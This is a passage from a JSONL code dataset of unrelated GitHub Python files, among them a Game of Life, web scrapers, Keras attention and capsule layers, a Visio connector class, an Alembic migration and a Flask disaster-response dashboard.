self.cells[row_number-1][col_number+1].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1 and col_number > 0:\n if self.cells[row_number+1][col_number-1].get_status():\n alive_neighbours += 1\n if row_number < self.number_cells_y -1 and col_number < self.number_cells_x -1:\n if self.cells[row_number+1][col_number+1].get_status():\n alive_neighbours += 1\n return alive_neighbours\n\n def _check_cells(self):\n \"\"\"Ckeck for all the cells that need to be updated once the game starts\"\"\"\n for row_number in range(self.number_cells_y):\n for col_number in range(self.number_cells_x):\n alive_neighbours = self._get_neighbours(row_number,col_number)\n \n self.to_be_updated[row_number][col_number] = False\n if self.cells[row_number][col_number].get_status():\n if alive_neighbours < 2:\n self.to_be_updated[row_number][col_number] = True\n elif alive_neighbours > 3:\n self.to_be_updated[row_number][col_number] = True\n else:\n if alive_neighbours == 3:\n self.to_be_updated[row_number][col_number] = True\n\n def _update_cells(self):\n \"\"\"Update cells once the game starts\"\"\"\n for row_number in range(self.number_cells_y):\n for col_number in range(self.number_cells_x):\n if self.to_be_updated[row_number][col_number]:\n self.cells[row_number][col_number].update()\n\n def _update_screen(self):\n \"\"\"Update all the cells and the background\"\"\"\n self.screen.fill(self.bg_colour)\n\n if not self.waiting:\n self._check_cells()\n self._update_cells()\n for row in self.cells:\n for cell in row:\n cell.draw_cell()\n \n pygame.display.flip()\n\nif __name__ == '__main__':\n gl = GameOfLife()\n gl.run_game()","repo_name":"adityakadoo/GameOfLife","sub_path":"game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29852607034","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://example.com'\nresponse = requests.get(url)\nsoup = BeautifulSoup(response.text, 'html.parser')\n\n# Extract and print all the links on the webpage\nlinks = soup.find_all('a')\nfor link in links:\n print(link.get('href'))\n","repo_name":"Daniel-Badura/Coding-Buddies-Community-Contributions","sub_path":"Python Basic Projects/webscrapper.py","file_name":"webscrapper.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"27836567704","text":"import json\nimport networkx as nx\nimport operator\n# base_dir = \"/Users/saurav/Desktop/OpenSoft/case_ranking/\"\n\ndef give_best_cases(case_dict, label_names):\n\t'''\n\t\tIn this function, give the input as a list of labels\n\t\tNote - the name of labels must match exactly with that in subject_to_case.txt\n\t'''\n\n # with open('subject_to_case.txt', 'r') as file:\n\t # json_data = file.read()\n\t\t# category_data = json.loads(json_data)\n\n\tcase_score = dict()\n\t# label_count = dict()\n\n\tfor labels in label_names:\n\t\ttry:\n\t\t\twith open(labels + '.txt', 'r') as file:\n\t\t\t\tjson_data = file.read()\n\t\t\t\tlabel_data = json.loads(json_data)\n\t\texcept:\n\t\t\tcontinue\n\t\tlength = len(label_data)\n\t\t# Cases present in label_data\n\t\tfor case in label_data:\n\t\t\tif case in case_dict:\n\t\t\t\tif case not in case_score:\n\t\t\t\t\tcase_score[case] = 0\n\t\t\t\telse:\n\t\t\t\t\tcase_score[case] = case_score[case] + label_data[case]*length\n\n\t# Assigning scores by using common citation graph\n\twith 
open('case_ranking.txt', 'r') as file:\n\t\tjson_data = file.read()\n\t\tcommon_case_ranking = json.loads(json_data)\n\n\tlength = len(common_case_ranking)\n\tfor case in case_score:\n\t\tif case in common_case_ranking:\n\t\t\tcase_score[case] = case_score[case] + common_case_ranking[case]*length\n\n\n\t# for case in case_score:\n\t# label_count[case] = len(case_dict[case]['categories'])\n\n\t# If case is in case_score, then it surely exists in case_dict\n\tcase_score = sorted(case_score.items(), key = operator.itemgetter(1))\n\n\tcase_score_list = []\n\tfor case in case_score:\n\t\tcase_score_list.append(case[0])\n\n\tcase_score_list.sort(key = lambda z: case_dict[z]['value'])\n\tcase_score_list.reverse()\n\t\t\n\treturn case_score_list[:100]\n\nif __name__ == '__main__':\n\tn = int(input(\"Number of Categories\"))\n\tlabel_names = []\n\tfor i in range(n):\n\t\tlabel = input(\"Give Category\")\n\t\tlabel_names.append(label)\n\tprint(label_names)\n\t# NOTE: give_best_cases() also needs a case_dict mapping; an empty dict is a placeholder here\n\tx = give_best_cases({}, label_names)\n\tprint(x)\n","repo_name":"142ayushkumar/LegalAssistant","sub_path":"case_ranking/top_cases_given_labels.py","file_name":"top_cases_given_labels.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"36540086851","text":"import pickle\nfrom oatd import ScrapeOatd\n\nx=1\n# current_user = getuser()\n\n\n# new_dict = dict(test_xx='test', other_la='other la')\n# new_dict.update(new_add='Geeks')\n# x = 1\n# url = 'https://oatd.org/oatd/search?q=eeg&form=basic'\nurl = 'https://oatd.org/oatd/search?q=eeg&form=basic&pubdate.facet=1991' # 88 result , 3 pages\noatd = ScrapeOatd()\nall_result = oatd.scrape_oatd(url)\nprint('complete scrape search result')\nall_website_scrape = oatd.loop_get_specific(all_result)\nprint('complete scrape specific page')\n\nx = 1\n\nwith open('oatd_complete_all_specific_page.pickle', 'wb') as handle:\n pickle.dump(all_website_scrape, handle, protocol=pickle.HIGHEST_PROTOCOL)\n print('complete saving')\n\n# html_oatd_specific_page\n# r = requests.get('https://oatd.org/oatd/record?record=handle\\:11012\\%2F16478&q=eeg')\n# page_soup = Soup(r.text, 'html.parser')","repo_name":"itayoron/Article_Search_Download_Automation","sub_path":"oatd_how_to_use.py","file_name":"oatd_how_to_use.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"73118731027","text":"import pandas as pd\r\nimport os\r\n\r\n\r\nabspath = os.path.abspath(__file__)\r\ndname = os.path.dirname(abspath)\r\nos.chdir(dname)\r\n\r\n\r\nfilename = \"DebtGDP.csv\"\r\ndf = pd.read_csv(filename)\r\nqs = df['date'].str.replace(r'(\\d+) (Q\\d)', r'\\1-\\2')\r\ndf['date'] = pd.PeriodIndex(qs, freq='Q').to_timestamp()\r\n\r\nfilelocation = os.getcwd()\r\nprint(\"Saving as: [ \" + filename + \" ] in: [ \" + filelocation + \" ] \")\r\ndf.to_csv(filename)\r\n","repo_name":"lhkkennedy/lhkkennedy.github.io","sub_path":"html/Debt/quarter-to-date.py","file_name":"quarter-to-date.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"13887005050","text":"#!python\nimport os \nimport pickle\n\nBASEDIR = '/p299/raw/2016/PM/split/'\n\nfiledict = dict()\nfilePathList = []\n\nfor root,dirs,files in os.walk(BASEDIR,topdown=True,followlinks=True):\n #if 'CA' not in root:\n # continue\n #if 'Reports' in root:\n # continue\n #if 'html' in root:\n # 
continue\n #print(root)\n for file in files:\n if not file.endswith('.gz'):\n continue\n fullpath = os.path.join(root,file)\n filePathList.append(fullpath)\n # fullid = file.split('_')[0]\n # if fullid not in filedict:\n # filedict[fullid] = []\n # if fullpath not in filedict[fullid]:\n # filedict[fullid].append(fullpath)\n print(\"add \",fullpath)\n\nprint('filedict size',len(filedict.keys()))\nprint('fullpath size',len(filePathList))\n\n#with open('filedict.pickle','wb') as fd:\n# pickle.dump(filedict,fd)\nwith open('pickle/filePathList.pickle','wb') as fpl:\n pickle.dump(filePathList,fpl)\nwith open('pickle/filePathList.xls','w') as fx:\n for file in filePathList:\n fx.write(file+'\\n')\n\n","repo_name":"seahurt/OGSManage","sub_path":"squery/scanFile.py","file_name":"scanFile.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5733252047","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nfrom abc import ABCMeta, abstractmethod\r\nfrom datetime import datetime\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pickle\r\nfrom keras.models import Model\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nfrom keras.layers import Layer, Activation\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras import backend as K\r\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\r\nimport sys\r\nsys.path.append('utils/')\r\nimport config\r\n\r\n\r\n\r\n\r\n\r\nclass Attention(Layer):\r\n def __init__(self, step_dim=config.word_maxlen,\r\n W_regularizer=None, b_regularizer=None,\r\n W_constraint=None, b_constraint=None,\r\n bias=True, **kwargs):\r\n \"\"\"\r\n Keras Layer that implements an Attention mechanism for temporal data.\r\n Supports Masking.\r\n Follows the work of Raffel et al. 
[https://arxiv.org/abs/1512.08756]\r\n # Input shape\r\n 3D tensor with shape: `(samples, steps, features)`.\r\n # Output shape\r\n 2D tensor with shape: `(samples, features)`.\r\n :param kwargs:\r\n Just put it on top of an RNN Layer (GRU/LSTM/SimpleRNN) with return_sequences=True.\r\n The dimensions are inferred based on the output shape of the RNN.\r\n Example:\r\n model.add(LSTM(64, return_sequences=True))\r\n model.add(Attention())\r\n \"\"\"\r\n self.supports_masking = True\r\n # self.init = initializations.get('glorot_uniform')\r\n self.init = initializers.get('glorot_uniform')\r\n\r\n self.W_regularizer = regularizers.get(W_regularizer)\r\n self.b_regularizer = regularizers.get(b_regularizer)\r\n\r\n self.W_constraint = constraints.get(W_constraint)\r\n self.b_constraint = constraints.get(b_constraint)\r\n\r\n self.bias = bias\r\n self.step_dim = step_dim\r\n self.features_dim = 0\r\n super(Attention, self).__init__(**kwargs)\r\n\r\n def build(self, input_shape):\r\n assert len(input_shape) == 3\r\n\r\n self.W = self.add_weight((input_shape[-1],),\r\n initializer=self.init,\r\n name='{}_W'.format(self.name),\r\n regularizer=self.W_regularizer,\r\n constraint=self.W_constraint)\r\n self.features_dim = input_shape[-1]\r\n\r\n if self.bias:\r\n self.b = self.add_weight((input_shape[1],),\r\n initializer='zero',\r\n name='{}_b'.format(self.name),\r\n regularizer=self.b_regularizer,\r\n constraint=self.b_constraint)\r\n else:\r\n self.b = None\r\n\r\n self.built = True\r\n\r\n def compute_mask(self, input, input_mask=None):\r\n # do not pass the mask to the next layers\r\n return None\r\n\r\n def call(self, x, mask=None):\r\n # eij = K.dot(x, self.W) TF backend doesn't support it\r\n\r\n # features_dim = self.W.shape[0]\r\n # step_dim = x._keras_shape[1]\r\n\r\n features_dim = self.features_dim\r\n step_dim = self.step_dim\r\n\r\n eij = K.reshape(K.dot(K.reshape(x, (-1, features_dim)), K.reshape(self.W, (features_dim, 1))), (-1, step_dim))\r\n\r\n if self.bias:\r\n eij += self.b\r\n\r\n eij = K.tanh(eij)\r\n\r\n a = K.exp(eij)\r\n\r\n # apply mask after the exp. 
will be re-normalized next\r\n if mask is not None:\r\n # Cast the mask to floatX to avoid float64 upcasting in theano\r\n a *= K.cast(mask, K.floatx())\r\n\r\n # in some cases especially in the early stages of training the sum may be almost zero\r\n a /= K.cast(K.sum(a, axis=1, keepdims=True) + K.epsilon(), K.floatx())\r\n\r\n a = K.expand_dims(a)\r\n weighted_input = x * a\r\n return K.sum(weighted_input, axis=1)\r\n\r\n def compute_output_shape(self, input_shape):\r\n # return input_shape[0], input_shape[-1]\r\n return input_shape[0], self.features_dim\r\n\r\n\r\ndef squash(x, axis=-1):\r\n # s_squared_norm is really small\r\n # s_squared_norm = K.sum(K.square(x), axis, keepdims=True) + K.epsilon()\r\n # scale = K.sqrt(s_squared_norm)/ (0.5 + s_squared_norm)\r\n # return scale * x\r\n s_squared_norm = K.sum(K.square(x), axis, keepdims=True)\r\n scale = K.sqrt(s_squared_norm + K.epsilon())\r\n return x / scale\r\n\r\n\r\nclass Capsule(Layer):\r\n def __init__(self, num_capsule, dim_capsule, routings=3, kernel_size=(9, 1), share_weights=True,\r\n activation='default', **kwargs):\r\n super(Capsule, self).__init__(**kwargs)\r\n self.num_capsule = num_capsule\r\n self.dim_capsule = dim_capsule\r\n self.routings = routings\r\n self.kernel_size = kernel_size\r\n self.share_weights = share_weights\r\n if activation == 'default':\r\n self.activation = squash\r\n else:\r\n self.activation = Activation(activation)\r\n\r\n def build(self, input_shape):\r\n super(Capsule, self).build(input_shape)\r\n input_dim_capsule = input_shape[-1]\r\n if self.share_weights:\r\n self.W = self.add_weight(name='capsule_kernel',\r\n shape=(1, input_dim_capsule,\r\n self.num_capsule * self.dim_capsule),\r\n # shape=self.kernel_size,\r\n initializer='glorot_uniform',\r\n trainable=True)\r\n else:\r\n input_num_capsule = input_shape[-2]\r\n self.W = self.add_weight(name='capsule_kernel',\r\n shape=(input_num_capsule,\r\n input_dim_capsule,\r\n self.num_capsule * self.dim_capsule),\r\n initializer='glorot_uniform',\r\n trainable=True)\r\n\r\n def call(self, u_vecs):\r\n if self.share_weights:\r\n u_hat_vecs = K.conv1d(u_vecs, self.W)\r\n else:\r\n u_hat_vecs = K.local_conv1d(u_vecs, self.W, [1], [1])\r\n\r\n batch_size = K.shape(u_vecs)[0]\r\n input_num_capsule = K.shape(u_vecs)[1]\r\n u_hat_vecs = K.reshape(u_hat_vecs, (batch_size, input_num_capsule,\r\n self.num_capsule, self.dim_capsule))\r\n u_hat_vecs = K.permute_dimensions(u_hat_vecs, (0, 2, 1, 3))\r\n # final u_hat_vecs.shape = [None, num_capsule, input_num_capsule, dim_capsule]\r\n\r\n b = K.zeros_like(u_hat_vecs[:, :, :, 0]) # shape = [None, num_capsule, input_num_capsule]\r\n for i in range(self.routings):\r\n b = K.permute_dimensions(b, (0, 2, 1)) # shape = [None, input_num_capsule, num_capsule]\r\n c = K.softmax(b)\r\n c = K.permute_dimensions(c, (0, 2, 1))\r\n b = K.permute_dimensions(b, (0, 2, 1))\r\n outputs = self.activation(K.batch_dot(c, u_hat_vecs, [2, 2]))\r\n if i < self.routings - 1:\r\n b = K.batch_dot(outputs, u_hat_vecs, [2, 3])\r\n\r\n return outputs\r\n\r\n def compute_output_shape(self, input_shape):\r\n return (None, self.num_capsule, self.dim_capsule)","repo_name":"zle1992/atec","sub_path":"models/layers/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":7351,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"48"} +{"seq_id":"25655435005","text":"import sys\nfrom collections import defaultdict\n\nsys.setrecursionlimit(10 ** 7)\nrl = sys.stdin.readline\n\n\ndef 
factorization(n):\n arr = []\n temp = n\n for i in range(2, int(-(-n ** 0.5 // 1)) + 1):\n if temp % i == 0:\n cnt = 0\n while temp % i == 0:\n cnt += 1\n temp //= i\n arr.append([i, cnt])\n \n if temp != 1:\n arr.append([temp, 1])\n if not arr:\n arr.append([n, 1])\n \n return arr\n\n\ndef mod_div(x, y, mod=10 ** 9 + 7):\n return x * pow(y, mod - 2, mod) % mod\n\n\ndef solve():\n _ = int(rl())\n A = list(map(int, rl().split()))\n MOD = 10 ** 9 + 7\n \n max_exp = defaultdict(int)\n for ai in A:\n facts = factorization(ai)\n for fact, m in facts:\n if max_exp[fact] < m:\n max_exp[fact] = m\n \n lcm = 1\n for num, exp in max_exp.items():\n lcm = lcm * pow(num, exp, MOD) % MOD\n \n ans = sum([mod_div(lcm, ai) for ai in A]) % MOD\n print(ans)\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"yuly3/atcoder","sub_path":"ABC/ABC152/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74681547984","text":"from __future__ import annotations\nimport shutil\nimport os\n\n\nimport xml.etree.ElementTree as ET\nfrom xml.etree.ElementTree import Element\n\nimport vsdx\nfrom .shapes import Shape\n\n\nclass Connect:\n \"\"\"Connect class to represent a connection between two `Shape` objects\"\"\"\n def __init__(self, xml: Element=None, page: vsdx.Page=None):\n if page is None:\n return\n if type(xml) is Element: # create from xml\n self.xml = xml\n self.page = page # type: vsdx.Page\n self.from_id = xml.attrib.get('FromSheet') # ref to the connector shape\n self.to_id = xml.attrib.get('ToSheet') # ref to the shape where the connector terminates\n self.from_rel = xml.attrib.get('FromCell') # i.e. EndX / BeginX\n self.to_rel = xml.attrib.get('ToCell') # i.e. PinX\n\n @staticmethod\n def create(page: vsdx.Page=None, from_shape: Shape = None, to_shape: Shape = None) -> Shape:\n \"\"\"Create a new Connect object between from_shape and to_shape\n\n :returns: a new Connect object\n :rtype: Shape\n \"\"\"\n\n if from_shape and to_shape: # create new connector shape and connect items between this and the two shapes\n # create new connect shape and get id\n media = vsdx.Media()\n connector_shape = media.straight_connector.copy(page) # default to straight connector\n connector_shape.text = '' # clear text used to find shape\n if not os.path.exists(page.vis._masters_folder):\n # Add masters folder to directory if not already present\n shutil.copytree(media._media_vsdx._masters_folder, page.vis._masters_folder)\n page.vis.load_master_pages() # load copied master page files into VisioFile object\n # add new master to document relationship\n page.vis._add_document_rel(rel_type=\"http://schemas.microsoft.com/visio/2010/relationships/masters\",\n target=\"masters/masters.xml\")\n # create masters/master1 elements in [Content_Types].xml\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.masters+xml\",\n part_name_path=\"/visio/masters/masters.xml\")\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.master+xml\",\n part_name_path=\"/visio/masters/master1.xml\")\n elif connector_shape.shape_name not in page.vis._titles_of_parts_list():\n print(f\"Warning: Updating existing Page/Master relationships not yet fully implemented. 
This may cause unexpected outputs.\")\n # vsdx has masters - but not this shape\n # todo: Complete this scenario\n #print(\"conn master page\", connector_shape.master_shape.page.filename)\n #print(\"max page file num\", [p.filename[-5:-4] for p in page.vis.master_pages])\n #print(\"max page id\", [p.page_id for p in page.vis.master_pages])\n rel_num = max([int(p.filename[-5:-4]) for p in page.vis.master_pages]) +1\n master_file_path = os.path.join(page.vis.directory, 'visio', 'masters', f'master{rel_num}.xml')\n #print(f\"m_num={rel_num} master_file_path={master_file_path}\")\n shutil.copy(connector_shape.master_shape.page.filename, master_file_path)\n # todo: ensure master page ID and RId is unique, update shape master_id to refer to new master\n # todo: update mast file name, and add content type override\n # todo: update masters.xml file contents?\n # todo: update visio/pages/_rels/page3.xml.rels - add: \n rels = page.rels_xml.getroot()\n new_rel = ET.fromstring(f'')\n new_rel.attrib['Id'] = f\"rID{rel_num}\"\n new_rel.attrib['Target'] = f\"../masters/master{rel_num}.xml\"\n rels.append(new_rel)\n page.vis._add_content_types_override(content_type=\"application/vnd.ms-visio.master+xml\",\n part_name_path=f\"/visio/masters/master{rel_num}.xml\")\n else:\n # vsdx has this master shape, but not related to this page\n master_page = page.vis.master_index.get(connector_shape.shape_name) # type: vsdx.Page\n rel_num = int(master_page.rel_id[-1])\n rels = page.rels_xml.getroot()\n new_rel = ET.fromstring(f'')\n new_rel.attrib['Id'] = master_page.rel_id\n new_rel.attrib['Target'] = \"../masters/master1.xml\"\n rels.append(new_rel)\n\n # update HeadingPairs and TitlesOfParts in app.xml\n if page.vis._get_app_xml_value('Masters') is None:\n page.vis._set_app_xml_value('Masters', '1')\n\n if connector_shape.shape_name not in page.vis._titles_of_parts_list(): # todo: replace static string with name from shape\n page.vis._add_titles_of_parts_item(connector_shape.shape_name)\n\n # copy style used by new connector shape\n if not page.vis._get_style_by_id(connector_shape.master_shape.line_style_id):\n # assume same if is ok, todo: use names for match and increment IDs\n media_style = media._media_vsdx._get_style_by_id(connector_shape.master_shape.line_style_id)\n page.vis._style_sheets().append(media_style)\n media._media_vsdx.close_vsdx()\n\n # set Begin and End Trigger formulae for the new shape - linking to shapes in destination page\n beg_trigger = connector_shape.cells.get('BegTrigger')\n beg_trigger.formula = beg_trigger.formula.replace('Sheet.1!', f'Sheet{from_shape.ID}!')\n end_trigger = connector_shape.cells.get('EndTrigger')\n end_trigger.formula = end_trigger.formula.replace('Sheet.2!', f'Sheet{to_shape.ID}!')\n\n # create connect relationships\n # todo: FromPart=\"12\" and ToPart=\"3\" represent the part of a shape to connection is from/to\n end_connect_xml = f''\n beg_connect_xml = f''\n\n # Add these new connection relationships to the page\n page.add_connect(Connect(xml=ET.fromstring(end_connect_xml), page=page))\n page.add_connect(Connect(xml=ET.fromstring(beg_connect_xml), page=page))\n #print(vsdx.pretty_print_element(connector_shape.xml))\n #print(connector_shape.geometry)\n\n connector_shape.set_start_and_finish(from_shape.center_x_y, to_shape.center_x_y)\n print([(m.rel_id, m.page_id) for m in page.vis.master_pages])\n return connector_shape\n\n @property\n def shape_id(self):\n # ref to the shape where the connector terminates - convenience property\n return self.to_id\n\n 
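    # --- Editor's sketch (not part of the original module): how the create()
    # classmethod above might be called. The file name and the
    # find_shape_by_text() lookups are illustrative assumptions, not a
    # confirmed part of this module's API.
    #
    #     import vsdx
    #     with vsdx.VisioFile('diagram.vsdx') as vis:    # hypothetical file
    #         page = vis.pages[0]
    #         a = page.find_shape_by_text('Start')       # hypothetical shapes
    #         b = page.find_shape_by_text('End')
    #         connector = Connect.create(page=page, from_shape=a, to_shape=b)
    #         vis.save_vsdx('diagram_connected.vsdx')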
@property\n def shape(self) -> Shape:\n return self.page.find_shape_by_id(self.shape_id)\n\n @property\n def connector_shape_id(self):\n # ref to the connector shape - convenience property\n return self.from_id\n\n @property\n def connector_shape(self) -> Shape:\n return self.page.find_shape_by_id(self.connector_shape_id)\n\n def __repr__(self):\n return f\"Connect: from={self.from_id} to={self.to_id} connector_id={self.connector_shape_id} shape_id={self.shape_id}\"\n","repo_name":"dave-howard/vsdx","sub_path":"vsdx/connectors.py","file_name":"connectors.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"48"}
{"seq_id":"24447186615","text":"def get_base_2(n):\n '''\n Algorithm for converting a number from base 10 to base 2\n :param n: The number read\n :return: Returns the number in base 2\n '''\n r=0\n p=1\n nr=0\n while n!=0:\n r=n%2\n n=n//2\n nr=nr+r*p\n p=p*10\n return nr\n\n\ndef test_get_base_2():\n assert get_base_2(730)== 1011011010\n assert get_base_2(251)== 11111011\n\n\ndef oglindit(n):\n '''\n Function for finding the reverse (mirror image) of a number.\n :param n: The number whose reverse we want\n :return: Returns the reversed number\n '''\n\n ogl=0\n while n!=0:\n ogl=ogl*10+n%10\n n=n//10\n return ogl\n\n\ndef is_antipalindrome(n):\n '''\n Determine whether the number is an anti-palindrome\n :param n: The number read\n :return: Returns a bool indicating whether the number is an anti-palindrome\n '''\n c1=0\n c2=0\n invers=oglindit(n)\n while n!=0:\n c1=n%10\n c2=invers%10\n n=n//10\n invers=invers//10\n if c1==c2:\n return False\n\n\n return True\n\n\ndef test_is_antipalindrome():\n assert is_antipalindrome(2783) == True\n assert is_antipalindrome(2773) == False\n\n\ndef is_palindrome(n):\n '''\n In this function we check whether a number is a palindrome\n :param n: Read n\n :return: Returns a bool indicating whether the number is a palindrome\n '''\n ogl=0\n palindrom=n\n while n!=0:\n ogl=ogl*10+n%10\n n=n//10\n if ogl==palindrom:\n return True\n else:\n return False\n\n\ndef test_is_palindrome():\n assert is_palindrome(121) == True\n assert is_palindrome(312) == False\n\ndef main():\n\n while True:\n print('1. Convert a number to base 2.')\n print('2. Is it an anti-palindrome?')\n print('3. Is it a palindrome?')\n optiune=input('Choose an option:')\n if optiune == '1':\n n=int(input('Enter a number'))\n print(get_base_2(n))\n elif optiune == '2':\n n =int(input('Enter a number'))\n print(is_antipalindrome(n))\n elif optiune== '3':\n n=int(input('Enter a number'))\n print(is_palindrome(n))\n elif optiune == 'x':\n break\n else:\n print('Invalid option.')\n\n\nif __name__ == '__main__':\n main()","repo_name":"AP-MI-2021/lab-2-RuginaAlex","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8207180405","text":"\"\"\"empty message\n\nRevision ID: d16a24635397\nRevises: 6d1746989e64\nCreate Date: 2022-09-05 15:16:40.030538\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd16a24635397'\ndown_revision = '6d1746989e64'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
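    # Editor's note (not generated by Alembic): every op.add_column() in
    # upgrade() below is mirrored by an op.drop_column() in downgrade(), in
    # reverse order, which is what keeps the migration reversible. A minimal
    # sketch of the pattern, with a hypothetical column name:
    #
    #     def upgrade():
    #         op.add_column('settings', sa.Column('someFlag', sa.Boolean(), nullable=True))
    #
    #     def downgrade():
    #         op.drop_column('settings', 'someFlag')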
###\n op.add_column('settings', sa.Column('webrtcPlaybackEnabled', sa.Boolean(), nullable=True))\n op.add_column('settings', sa.Column('webrtcSignalProtocol', sa.String(length=128), nullable=True))\n op.add_column('settings', sa.Column('webrtcSignalURL', sa.String(length=1024), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('settings', 'webrtcSignalURL')\n op.drop_column('settings', 'webrtcSignalProtocol')\n op.drop_column('settings', 'webrtcPlaybackEnabled')\n # ### end Alembic commands ###\n","repo_name":"Open-Streaming-Platform/open-streaming-platform","sub_path":"migrations/versions/d16a24635397_.py","file_name":"d16a24635397_.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"48"} +{"seq_id":"42407151843","text":"import json\r\nimport plotly\r\nimport pandas as pd\r\nimport re\r\nfrom collections import Counter\r\n\r\n# import NLP libraries\r\nfrom tokenizer_function import Tokenizer, tokenize\r\n\r\nfrom flask import Flask\r\nfrom flask import render_template, request, jsonify\r\nfrom plotly.graph_objs import Bar\r\nfrom sklearn.externals import joblib\r\nfrom sqlalchemy import create_engine\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.before_first_request\r\n\r\ndef load_model_data():\r\n global df\r\n global model\r\n # load data\r\n\r\n engine = create_engine('sqlite:///data/DisasterResponse.db')\r\n df = pd.read_sql_table('DisasterResponse', engine)\r\n\r\n # load model\r\n model = joblib.load(\"models/adaboost_model.pkl\")\r\n\r\n# index webpage displays cool visuals and receives user input text for model\r\n@app.route('/')\r\n@app.route('/index')\r\n\r\ndef index():\r\n \r\n # extract data needed for visuals\r\n # Message counts of different generes\r\n genre_counts = df.groupby('genre').count()['message']\r\n genre_names = list(genre_counts.index)\r\n\r\n # Message counts for different categories\r\n cate_counts_df = df.iloc[:, 4:].sum().sort_values(ascending=False)\r\n cate_counts = list(cate_counts_df)\r\n cate_names = list(cate_counts_df.index)\r\n\r\n # Top keywords in Social Media in percentages\r\n social_media_messages = ' '.join(df[df['genre'] == 'social']['message'])\r\n social_media_tokens = tokenize(social_media_messages)\r\n social_media_wrd_counter = Counter(social_media_tokens).most_common()\r\n social_media_wrd_cnt = [i[1] for i in social_media_wrd_counter]\r\n social_media_wrd_pct = [i/sum(social_media_wrd_cnt) *100 for i in social_media_wrd_cnt]\r\n social_media_wrds = [i[0] for i in social_media_wrd_counter]\r\n\r\n # Top keywords in Direct in percentages\r\n direct_messages = ' '.join(df[df['genre'] == 'direct']['message'])\r\n direct_tokens = tokenize(direct_messages)\r\n direct_wrd_counter = Counter(direct_tokens).most_common()\r\n direct_wrd_cnt = [i[1] for i in direct_wrd_counter]\r\n direct_wrd_pct = [i/sum(direct_wrd_cnt) * 100 for i in direct_wrd_cnt]\r\n direct_wrds = [i[0] for i in direct_wrd_counter]\r\n\r\n # create visuals\r\n\r\n graphs = [\r\n # Histogram of the message genere\r\n {\r\n 'data': [\r\n Bar(\r\n x=genre_names,\r\n y=genre_counts\r\n )\r\n ],\r\n\r\n 'layout': {\r\n 'title': 'Distribution of Message Genres',\r\n 'yaxis': {\r\n 'title': \"Count\"\r\n },\r\n 'xaxis': {\r\n 'title': \"Genre\"\r\n }\r\n }\r\n },\r\n # histogram of social media messages top 30 keywords \r\n {\r\n 'data': [\r\n Bar(\r\n x=social_media_wrds[:50],\r\n 
y=social_media_wrd_pct[:50]\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Top 50 Keywords in Social Media Messages\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"% Total Social Media Messages\" \r\n }\r\n }\r\n }, \r\n\r\n # histogram of direct messages top 50 keywords \r\n {\r\n 'data': [\r\n Bar(\r\n x=direct_wrds[:50],\r\n y=direct_wrd_pct[:50]\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Top 50 Keywords in Direct Messages\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"% Total Direct Messages\" \r\n }\r\n }\r\n }, \r\n\r\n\r\n\r\n # histogram of messages categories distributions\r\n {\r\n 'data': [\r\n Bar(\r\n x=cate_names,\r\n y=cate_counts\r\n )\r\n ],\r\n\r\n 'layout':{\r\n 'title': \"Distribution of Message Categories\",\r\n 'xaxis': {'tickangle':60\r\n },\r\n 'yaxis': {\r\n 'title': \"count\" \r\n }\r\n }\r\n }, \r\n\r\n ]\r\n \r\n # encode plotly graphs in JSON\r\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\r\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\r\n \r\n # render web page with plotly graphs\r\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\r\n\r\n\r\n# web page that handles user query and displays model results\r\n@app.route('/go')\r\ndef go():\r\n # save user input in query\r\n query = request.args.get('query', '') \r\n\r\n # use model to predict classification for query\r\n classification_labels = model.predict([query])[0]\r\n classification_results = dict(zip(df.columns[4:], 